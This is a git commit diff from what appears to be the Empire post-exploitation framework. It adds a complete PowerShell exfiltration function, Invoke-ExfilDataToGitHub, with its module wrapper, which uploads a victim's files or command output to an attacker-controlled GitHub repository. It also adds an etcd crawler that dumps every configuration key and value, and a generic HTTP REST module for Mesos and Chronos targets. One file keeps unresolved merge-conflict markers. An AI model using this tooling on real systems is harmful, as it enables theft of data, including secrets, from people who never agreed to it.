Fix pyinstaller launcher. Update setup script

mdns
Chris 2016-12-09 15:59:38 -05:00
commit e288af484e
9 changed files with 555 additions and 252 deletions

View File

@ -0,0 +1,294 @@
function Invoke-ExfilDataToGitHub
{
<#
.SYNOPSIS
Use this script to exfiltrate data and files to a GitHub account.
Using GitHub v3 REST API tutorial here
https://channel9.msdn.com/Blogs/trevor-powershell/Automating-the-GitHub-REST-API-Using-PowerShell
.DESCRIPTION
.PARAMETER GHUser
GitHub Username
.PARAMETER GHRepo
GitHub repository
.PARAMETER GHPAT
GitHub Personal Access Token
.PARAMETER GHFilePath
GitHub filepath not including the filename so eg. testfolder/
.PARAMETER LocalFilePath
Local file path of files to upload
.PARAMETER GHFileName
GitHub filename eg. testfile.txt
.PARAMETER Filter
Local file filter eg. '*.*' to get all files (default), '*.pdf' for all pdfs, or 'file.txt, file2.docx' to get a comma-delimited list of files from that dirctory.
.PARAMETER Data
Data to write to file
.SWITCH Recurse
Recursively get files from subdirectories of given local filepath
.EXAMPLE
# This example exfiltrates data to a file - keys do not work
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
-GHFilePath "testfolder/" -GHFileName "testfile3" -Data (dir c:\windows | Out-String )
.EXAMPLE
# This example exfiltrates files from a given directory and filter
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
-GHFilePath "testfolder/" -LocalfilePath "C:\temp\" -Filter "*.pdf"
.EXAMPLE
# This examples exfiltrates specific files from a given directory
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
-GHFilePath "testfolder" -LocalfilePath "C:\temp" -Filter "play.pptx, test.pub, blank.docx" -Recurse
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$GHUser,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$GHRepo,
[Parameter(Position = 2, Mandatory = $True)]
[String]
$GHPAT, # This should be base64 encoded
[Parameter(Position =3, Mandatory = $True)]
[String]
$GHFilePath,
[Parameter(Position = 4, Mandatory=$True, ParameterSetName="ExfilFilesFromFilePath")]
[String]
$LocalFilePath,
[Parameter(Position = 4, Mandatory = $True, ParameterSetName="ExfilDataToFile")]
[String]
$GHFileName,
[Parameter(Position = 5, Mandatory = $True, ParameterSetName="ExfilFilesFromFilePath")]
[String]
$Filter = "*.*",
[Parameter(Position = 5, Mandatory = $True, ParameterSetName="ExfilDataToFile")]
[String]
$Data,
[Parameter(Mandatory = $False, ParameterSetName="ExfilFilesFromFilePath")]
[switch]
$Recurse = $False
)
# Decode the GitHub Personal Access Token
$GHPAT = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($GHPAT))
# Get the PAT in the correct format
$Token = $GHUser + ":" + $GHPAT
# Convert this to Base64
$Base64Token = [System.Convert]::ToBase64String([char[]]$Token)
$Headers = @{
Authorization = 'Basic {0}' -f $Base64Token;
};
#region ExfilDataToFile
if ($PsCmdlet.ParameterSetName -eq "ExfilDataToFile")
{
# Make sure filepaths are in correct format
if ($GHFilePath[-1] -ne "/") { $GHFilePath += "/" }
# Before deleting or inserting check to see if the file exists, if it does then get the sha and delete the file first
$GHAPI = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $GHFilePath + $GHFileName
$Body = @{
path = $GHFilePath + $GHFileName;
ref = "master";
}
Try {
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Get -ErrorAction SilentlyContinue
# If we get here that means we were able to get the contents so get hold of the sha
$sha = $content.sha
}
Catch {
$ErrorMessage = "Trying to get file contents: " + $_.Exception.Message;
Write-Error $ErrorMessage;
}
# Delete the file if it already exists
if ($sha -ne $null){
$Body = @{
path = $GHFileName;
message = "deleted file";
sha = $sha;
} | ConvertTo-Json;
try {
Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Delete -ErrorAction SilentlyContinue
}
catch{
$ErrorMessage = "Trying to delete file: " + $_.Exception.Message;
Write-Error $ErrorMessage;
}
}
# Here we are adding the file
$Body = @{
path = $GHFileName;
content = [System.Convert]::ToBase64String([char[]]$Data);
encoding = 'base64';
message = "Commit at: " + (Get-Date);
} | ConvertTo-Json;
try{
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Put -ErrorAction SilentlyContinue
}
catch{
$ErrorMessage = "Trying to create file: " + $_.Exception.Message;
Write-Error $ErrorMessage;
}
}
#endregion
#region ExfilFilesFromFilePath
if ($PsCmdlet.ParameterSetName -eq "ExfilFilesFromFilePath")
{
# Make sure filepaths are in correct format
if ($GHFilePath[-1] -ne "/") { $GHFilePath += "/" }
if ($LocalFilePath[-1] -ne "\") { $LocalFilePath += "\" }
# Get the collection of files from the filter
$Files = @()
$Filters = $Filter.Split(',')
ForEach ($fil in $Filters) {
# Check if files should be recursively retrieved
if ($Recurse -eq $True){
Get-ChildItem -Recurse ($LocalFilePath + $fil.Trim()) | ForEach-Object { $Files += $_ }
}
elseif ($Recurse -eq $False) {
Get-ChildItem ($LocalFilePath + $fil.Trim()) | ForEach-Object { $Files += $_ }
}
}
ForEach ($file in $Files){
Try {
# Construct the API URL
$GHAPI = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $GHFilePath + $file.Name
# Check to see if the file already exists
$Body = @{
path = $GHFilePath + $file.Name;
ref = "master";
}
Try {
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Get -ErrorAction SilentlyContinue
# If we get here that means we were able to get the contents so get hold of the sha
$sha = $content.sha
}
Catch {
$ErrorMessage = "Trying to get file contents: " + $_.Exception.Message;
Write-Error $ErrorMessage;
}
# Delete the file if it already exists
if ($sha -ne $null){
$Body = @{
path = $file.Name;
message = "deleted file";
sha = $sha;
} | ConvertTo-Json;
try {
Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Delete -ErrorAction SilentlyContinue
}
catch{
$ErrorMessage = "Trying to delete file: " + $_.Exception.Message;
Write-Error $ErrorMessage;
}
}
# Upload the file
# Get the file as a byte array
$FileBytes = Get-Content -Path $file.FullName -Encoding Byte
# Base 64 encode the byte array
$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes)
# Set the body context for GitHub
$Body = @{
path = $file.Name
content = $Base64EncodedFileBytes;
encoding = 'base64'
message = "Commit at: " + (Get-Date);
} | ConvertTo-Json
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Put -ErrorAction SilentlyContinue | Write-Output
}
Catch {
$ErrorMessage = "Trying to upload file " + $file.FullName + " :" + $_.Exception.Message;
Write-Error $ErrorMessage
}
}
}
#endregion
}

View File

@ -0,0 +1,146 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Invoke-ExfilDataToGitHub',
# list of one or more authors for the module
'Author': ['Nga Hoang'],
# more verbose multi-line description of the module
'Description': ('Use this module to exfil files and data to GitHub. '
'Requires the pre-generation of a GitHub Personal Access Token.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# True if the module needs admin rights to run
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
# Disabled - this can be a relatively noisy module but sometimes useful
'OpsecSafe' : True,
'Language' : 'powershell',
# The minimum PowerShell version needed for the module to run
'MinLanguageVersion' : '3',
# list of any references/other comments
'Comments': [
'https://github.com/nnh100/exfil'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run module on',
'Required' : True,
'Value' : ''
},
'GHUser' : {
'Description' : 'GitHub Username',
'Required' : True,
'Value' : ''
},
'GHRepo' : {
'Description' : 'GitHub Repository',
'Required' : True,
'Value' : ''
},
'GHPAT' : {
'Description' : 'GitHub Personal Access Token base64 encoded',
'Required' : True,
'Value' : ''
},
'GHFilePath' : {
'Description' : 'GitHub filepath not including the filename so eg. testfolder/',
'Required' : True,
'Value' : ''
},
'LocalFilePath' : {
'Description' : 'Local file path of files to upload ',
'Required' : False,
'Value' : ''
},
'GHFileName' : {
'Description' : 'GitHub filename eg. testfile.txt',
'Required' : False,
'Value' : ''
},
'Filter' : {
'Description' : 'Local file filter eg. *.* to get all files or *.pdf for all pdfs',
'Required' : False,
'Value' : ''
},
'Data' : {
'Description' : 'Data to write to file',
'Required' : False,
'Value' : ''
},
'Recurse' : {
'Description' : 'Recursively get files in subfolders eg. set True or leave blank (do not use for Data exfil) ',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# Need to actually run the module that has been loaded
script += 'Invoke-ExfilDataToGitHub'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
return script

View File

@ -47,7 +47,7 @@ class Module:
# value_name : {description, required, default_value} # value_name : {description, required, default_value}
'Agent' : { 'Agent' : {
# The 'Agent' option is the only one that MUST be in a module # The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to grab a screenshot from.', 'Description' : 'Agent to run smbautobrute from.',
'Required' : True, 'Required' : True,
'Value' : '' 'Value' : ''
}, },

View File

@ -7,19 +7,19 @@ class Module:
# metadata info about the module, not modified during runtime # metadata info about the module, not modified during runtime
self.info = { self.info = {
# name for the module that will appear in module menus # name for the module that will appear in module menus
'Name': 'Chronos API List Jobs', 'Name': 'Etcd Crawler',
# list of one or more authors for the module # list of one or more authors for the module
'Author': ['@TweekFawkes'], 'Author': ["@scottjpack",'@TweekFawkes'],
# more verbose multi-line description of the module # more verbose multi-line description of the module
'Description': ('List Chronos jobs using the HTTP API service for the Chronos Framework'), 'Description': ('Pull keys and values from an etcd configuration store'),
# True if the module needs to run in the background # True if the module needs to run in the background
'Background' : False, 'Background' : True,
# File extension to save the file as # File extension to save the file as
'OutputExtension': "json", 'OutputExtension': "",
# if the module needs administrative privileges # if the module needs administrative privileges
'NeedsAdmin' : False, 'NeedsAdmin' : False,
@ -34,7 +34,7 @@ class Module:
'MinLanguageVersion' : '2.6', 'MinLanguageVersion' : '2.6',
# list of any references/other comments # list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"] 'Comments': ["Docs: https://coreos.com/etcd/docs/latest/api.html"]
} }
# any options needed by the module, settable during runtime # any options needed by the module, settable during runtime
@ -51,13 +51,19 @@ class Module:
# The 'Agent' option is the only one that MUST be in a module # The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.', 'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True, 'Required' : True,
'Value' : 'chronos.mesos' 'Value' : 'etcd.mesos'
}, },
'Port' : { 'Port' : {
# The 'Agent' option is the only one that MUST be in a module # The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.', 'Description' : 'The etcd client communication port, typically 2379 or 1026.',
'Required' : True, 'Required' : True,
'Value' : '8080' 'Value' : '1026'
},
'Depth' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'How far into the ETCD hierarchy to recurse. 0 for root keys only, "-1" for no limitation',
'Required' : True,
'Value' : '-1'
} }
} }
@ -71,6 +77,7 @@ class Module:
# in case options are passed on the command line # in case options are passed on the command line
if params: if params:
for param in params: for param in params:
# parameter format is [Name, Value]
option, value = param option, value = param
if option in self.options: if option in self.options:
self.options[option]['Value'] = value self.options[option]['Value'] = value
@ -78,28 +85,51 @@ class Module:
def generate(self): def generate(self):
target = self.options['Target']['Value'] target = self.options['Target']['Value']
#port = self.options['Port']['Value']
#print str("port: " + port)
#depth = self.options['Depth']['Value']
#print str("depth: " + port)
#if not type(depth) == type(1):
# depth = int(depth)
#if not type(port) == type(1):
# port = int(port)
port = self.options['Port']['Value'] port = self.options['Port']['Value']
depth = self.options['Depth']['Value']
#print str("target: " + target)
#print str("port: " + port)
#print str("depth: " + depth)
script = """ script = """
import urllib2 import urllib2
import json
target = "%s" target = "%s"
port = "%s" port = "%s"
depth = "%s"
url = "http://" + target + ":" + port + "/scheduler/jobs" def get_etcd_keys(target, port, path, depth):
keys = {}
resp = urllib2.urlopen("http://" + target + ":" + port + "/v2/keys" + path)
r = resp.read()
r = json.loads(r)
for n in r['node']['nodes']:
if "dir" in n.keys() and (depth>0):
keys.update(get_etcd_keys(target, port, n['key'], depth-1))
elif "dir" in n.keys() and (depth == -1):
keys.update(get_etcd_keys(target, port, n['key'], depth))
elif "value" in n.keys():
keys[n['key']] = n['value']
else:
keys[n['key']] = "directory"
return keys
try: def main():
request = urllib2.Request(url) k = get_etcd_keys(target, port, "/", depth)
request.add_header('User-Agent', print str(k)
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
""" %(target, port) main()
""" % (target, port, depth)
return script return script

View File

@ -1,106 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Marathon API List Apps',
# list of one or more authors for the module
'Author': ['@scottjpack','@TweekFawkes'],
# more verbose multi-line description of the module
'Description': ('List Marathon Apps using Marathon\'s REST API'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension': "json",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Marathon REST API documentation version 2.0: https://mesosphere.github.io/marathon/docs/generated/api.html", "Marathon REST API: https://mesosphere.github.io/marathon/docs/rest-api.html", "Marathon REST API: https://open.mesosphere.com/advanced-course/marathon-rest-api/"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True,
'Value' : 'marathon.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.',
'Required' : True,
'Value' : '8080'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
script = """
import urllib2
target = "%s"
port = "%s"
url = "http://" + target + ":" + port + "/v2/apps"
try:
request = urllib2.Request(url)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
request.add_header('Content-Type', 'application/json')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
print "Finished"
""" %(target, port)
return script

View File

@ -1,105 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Mesos Master API List Slaves',
# list of one or more authors for the module
'Author': ['@scottjpack', '@TweekFawkes'],
# more verbose multi-line description of the module
'Description': ('List Mesos Agents/Slaves using the HTTP API for the Mesos Master service'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension': "json",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True,
'Value' : 'master.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.',
'Required' : True,
'Value' : '5050'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
script = """
import urllib2
target = "%s"
port = "%s"
url = "http://" + target + ":" + port + "/slaves"
try:
request = urllib2.Request(url)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
""" %(target, port)
return script

View File

@ -7,19 +7,19 @@ class Module:
# metadata info about the module, not modified during runtime # metadata info about the module, not modified during runtime
self.info = { self.info = {
# name for the module that will appear in module menus # name for the module that will appear in module menus
'Name': 'Mesos DNS API Enumeration', 'Name': 'HTTP REST API',
# list of one or more authors for the module # list of one or more authors for the module
'Author': ['@TweekFawkes'], 'Author': ['@TweekFawkes',"@scottjpack"],
# more verbose multi-line description of the module # more verbose multi-line description of the module
'Description': ('Enumerate Mesos DNS information using the HTTP API for the Mesos DNS service'), 'Description': ('Interacts with a HTTP REST API and returns the results back to the screen.'),
# True if the module needs to run in the background # True if the module needs to run in the background
'Background' : False, 'Background' : True,
# File extension to save the file as # File extension to save the file as
'OutputExtension': "json", 'OutputExtension': "",
# if the module needs administrative privileges # if the module needs administrative privileges
'NeedsAdmin' : False, 'NeedsAdmin' : False,
@ -34,7 +34,7 @@ class Module:
'MinLanguageVersion' : '2.6', 'MinLanguageVersion' : '2.6',
# list of any references/other comments # list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"] 'Comments': ["Docs: https://mesos.github.io/chronos/docs/api.html", "urllib2 DELETE method credits to: http://stackoverflow.com/questions/21243834/doing-put-using-python-urllib2"]
} }
# any options needed by the module, settable during runtime # any options needed by the module, settable during runtime
@ -47,17 +47,35 @@ class Module:
'Required' : True, 'Required' : True,
'Value' : '' 'Value' : ''
}, },
'Protocol' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Protocol or Scheme to use.',
'Required' : True,
'Value' : 'http'
},
'Target' : { 'Target' : {
# The 'Agent' option is the only one that MUST be in a module # The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.', 'Description' : 'FQDN, domain name, or hostname of the remote target.',
'Required' : True, 'Required' : True,
'Value' : 'master.mesos' 'Value' : 'master.mesos'
}, },
'Port' : { 'Port' : {
# The 'Agent' option is the only one that MUST be in a module # The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to scan for.', 'Description' : 'The port to connect to.',
'Required' : True, 'Required' : True,
'Value' : '8123' 'Value' : '8123'
},
'Path' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The path.',
'Required' : True,
'Value' : '/v1/version'
},
'RequMethod' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The HTTP request method to use.',
'Required' : True,
'Value' : 'GET'
} }
} }
@ -78,20 +96,39 @@ class Module:
def generate(self): def generate(self):
protocol = self.options['Protocol']['Value']
target = self.options['Target']['Value'] target = self.options['Target']['Value']
port = self.options['Port']['Value'] port = self.options['Port']['Value']
path = self.options['Path']['Value']
requmethod = self.options['RequMethod']['Value']
script = """ script = """
import urllib2 import urllib2
protocol = "%s"
target = "%s" target = "%s"
port = "%s" port = "%s"
path = "%s"
requmethod = "%s"
url = "http://" + target + ":" + port + "/v1/enumerate" url = protocol + "://" + target + ":" + port + path
class MethodRequest(urllib2.Request):
def __init__(self, *args, **kwargs):
if 'method' in kwargs:
self._method = kwargs['method']
del kwargs['method']
else:
self._method = None
return urllib2.Request.__init__(self, *args, **kwargs)
def get_method(self, *args, **kwargs):
if self._method is not None:
return self._method
return urllib2.Request.get_method(self, *args, **kwargs)
try: try:
request = urllib2.Request(url) request = MethodRequest(url, method=requmethod)
request.add_header('User-Agent', request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) ' 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0') 'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
@ -101,6 +138,7 @@ try:
except Exception as e: except Exception as e:
print "Failure sending payload: " + str(e) print "Failure sending payload: " + str(e)
""" %(target, port) print "Finished"
""" %(protocol, target, port, path, requmethod)
return script return script

View File

@ -117,8 +117,12 @@ class Stager:
cur.close() cur.close()
import os import os
<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py
stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py" stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py"
#stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py") #stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py")
=======
stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py")
>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py
filesToExtractImportsFrom_List.append(stagerFFP_Str) filesToExtractImportsFrom_List.append(stagerFFP_Str)
agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py" agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py"
@ -137,6 +141,8 @@ class Stager:
helpers.color(line) helpers.color(line)
imports_List.append(line) imports_List.append(line)
imports_List.append('import trace')
imports_List.append('import json')
imports_List = list(set(imports_List)) # removing duplicate strings imports_List = list(set(imports_List)) # removing duplicate strings
imports_Str = "\n".join(imports_List) imports_Str = "\n".join(imports_List)
launcher = imports_Str + "\n" + launcher launcher = imports_Str + "\n" + launcher

View File

@ -15,7 +15,7 @@ fi
version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 ) version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 )
if lsb_release -d | grep -q "Fedora"; then if lsb_release -d | grep -q "Fedora"; then
Release=Fedora Release=Fedora
dnf install -y python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel dnf install -y make g++ python-pip python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel
pip install setuptools pip install setuptools
pip install pycrypto pip install pycrypto
pip install iptools pip install iptools
@ -27,7 +27,7 @@ if lsb_release -d | grep -q "Fedora"; then
pip install pyinstaller pip install pyinstaller
elif lsb_release -d | grep -q "Kali"; then elif lsb_release -d | grep -q "Kali"; then
Release=Kali Release=Kali
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
pip install setuptools pip install setuptools
pip install pycrypto pip install pycrypto
pip install iptools pip install iptools
@ -39,7 +39,7 @@ elif lsb_release -d | grep -q "Kali"; then
pip install pyinstaller pip install pyinstaller
elif lsb_release -d | grep -q "Ubuntu"; then elif lsb_release -d | grep -q "Ubuntu"; then
Release=Ubuntu Release=Ubuntu
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
pip install setuptools pip install setuptools
pip install pycrypto pip install pycrypto
pip install iptools pip install iptools
@ -52,7 +52,7 @@ elif lsb_release -d | grep -q "Ubuntu"; then
pip install pyinstaller pip install pyinstaller
else else
echo "Unknown distro - Debian/Ubuntu Fallback" echo "Unknown distro - Debian/Ubuntu Fallback"
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl-dev
pip install setuptools pip install setuptools
pip install pycrypto pip install pycrypto
pip install iptools pip install iptools